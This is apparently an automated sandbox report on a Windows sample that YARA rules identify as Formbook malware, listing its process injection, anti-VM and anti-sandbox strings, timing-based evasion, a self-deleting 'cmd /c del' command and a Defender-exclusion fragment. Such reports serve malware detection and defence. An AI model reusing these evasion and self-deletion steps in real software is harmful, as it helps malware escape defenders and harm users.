Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35AF8	0_2_09F35AF8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34AC0	0_2_09F34AC0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34ABF	0_2_09F34ABF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30580	0_2_09F30580
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F37584	0_2_09F37584
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30571	0_2_09F30571
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F36D61	0_2_09F36D61
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F36D68	0_2_09F36D68
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F31497	0_2_09F31497
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F31498	0_2_09F31498
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39C57	0_2_09F39C57
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39C58	0_2_09F39C58
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35C31	0_2_09F35C31
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F307C0	0_2_09F307C0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F307B0	0_2_09F307B0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F33720	0_2_09F33720
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E83	0_2_09F39E83
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E65	0_2_09F39E65
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041E1CF	4_2_0041E1CF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D23B	4_2_0041D23B
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00409E40	4_2_00409E40
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D6CF	4_2_0041D6CF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041BFB6	4_2_0041BFB6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA6E30	9_2_02AA6E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABEBB0	9_2_02ABEBB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B090	9_2_02A9B090
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41002	9_2_02B41002
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9841F	9_2_02A9841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2581	9_2_02AB2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9D5E0	9_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A80D20	9_2_02A80D20
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8F900	9_2_02A8F900
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B51D55	9_2_02B51D55
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D23B	9_2_0242D23B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242E1CF	9_2_0242E1CF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02419E40	9_2_02419E40
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412FB0	9_2_02412FB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242BFB6	9_2_0242BFB6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412D87	9_2_02412D87
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412D90	9_2_02412D90

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\help.exe

Code function: String function: 02A8B150 appears 32 times

PE file contains strange resources

Source: GiG35Rwmz6.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: GiG35Rwmz6.exe	Binary or memory string: OriginalFilename vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000002.679951755.0000000007EB0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000000.661313043.00000000004A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKygo.dll* vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000002.729162060.0000000000B56000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000000.671606108.0000000000512000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe

Uses 32bit PE files

Source: GiG35Rwmz6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: GiG35Rwmz6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/2

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GiG35Rwmz6.exe.log

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: unknown	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'	Jump to behavior

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_003C5097 push ss; retf	0_2_003C50A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_003C4AEA push ebx; retf	0_2_003C4B11
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C8069A push FFFFFFBAh; retf	0_2_00C8069C
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82DCF push ecx; retf	0_2_00C82DD1
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82DD9 push ecx; retf	0_2_00C82DDB
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F3523A pushfd ; ret	0_2_09F35245
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041E041 pushfd ; iretd	4_2_0041E051
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_004170CB push edi; ret	4_2_004170CC
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D0D2 push eax; ret	4_2_0041D0D8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D0DB push eax; ret	4_2_0041D142
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D085 push eax; ret	4_2_0041D0D8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00416888 push FFFFFFFAh; ret	4_2_00416890
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D13C push eax; ret	4_2_0041D142
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00416C3E push ecx; retf	4_2_00416C3F
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041DD3C push cs; ret	4_2_0041DD3D
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041DD82 push ebp; retf	4_2_0041DD83
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00417628 push ds; iretd	4_2_0041762B
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00435097 push ss; retf	4_2_004350A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00434AEA push ebx; retf	4_2_00434B11
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ADD0D1 push ecx; ret	9_2_02ADD0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242E041 pushfd ; iretd	9_2_0242E051
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_024270CB push edi; ret	9_2_024270CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D0D2 push eax; ret	9_2_0242D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D0DB push eax; ret	9_2_0242D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D085 push eax; ret	9_2_0242D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02426888 push FFFFFFFAh; ret	9_2_02426890
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D13C push eax; ret	9_2_0242D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02427628 push ds; iretd	9_2_0242762B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02426C3E push ecx; retf	9_2_02426C3F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242DD3C push cs; ret	9_2_0242DD3D
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242DD82 push ebp; retf	9_2_0242DD83

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GiG35Rwmz6.exe PID: 6564, type: MEMORY

Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000024198E4 second address: 00000000024198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002419B5E second address: 0000000002419B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6568	Thread sleep time: -103004s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6664	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 6552	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread delayed: delay time: 103004			Jump to behavior
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.703640273.000000000FC60000.00000004.00000001.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&]
Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.698916741.000000000A64D000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.693172351.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
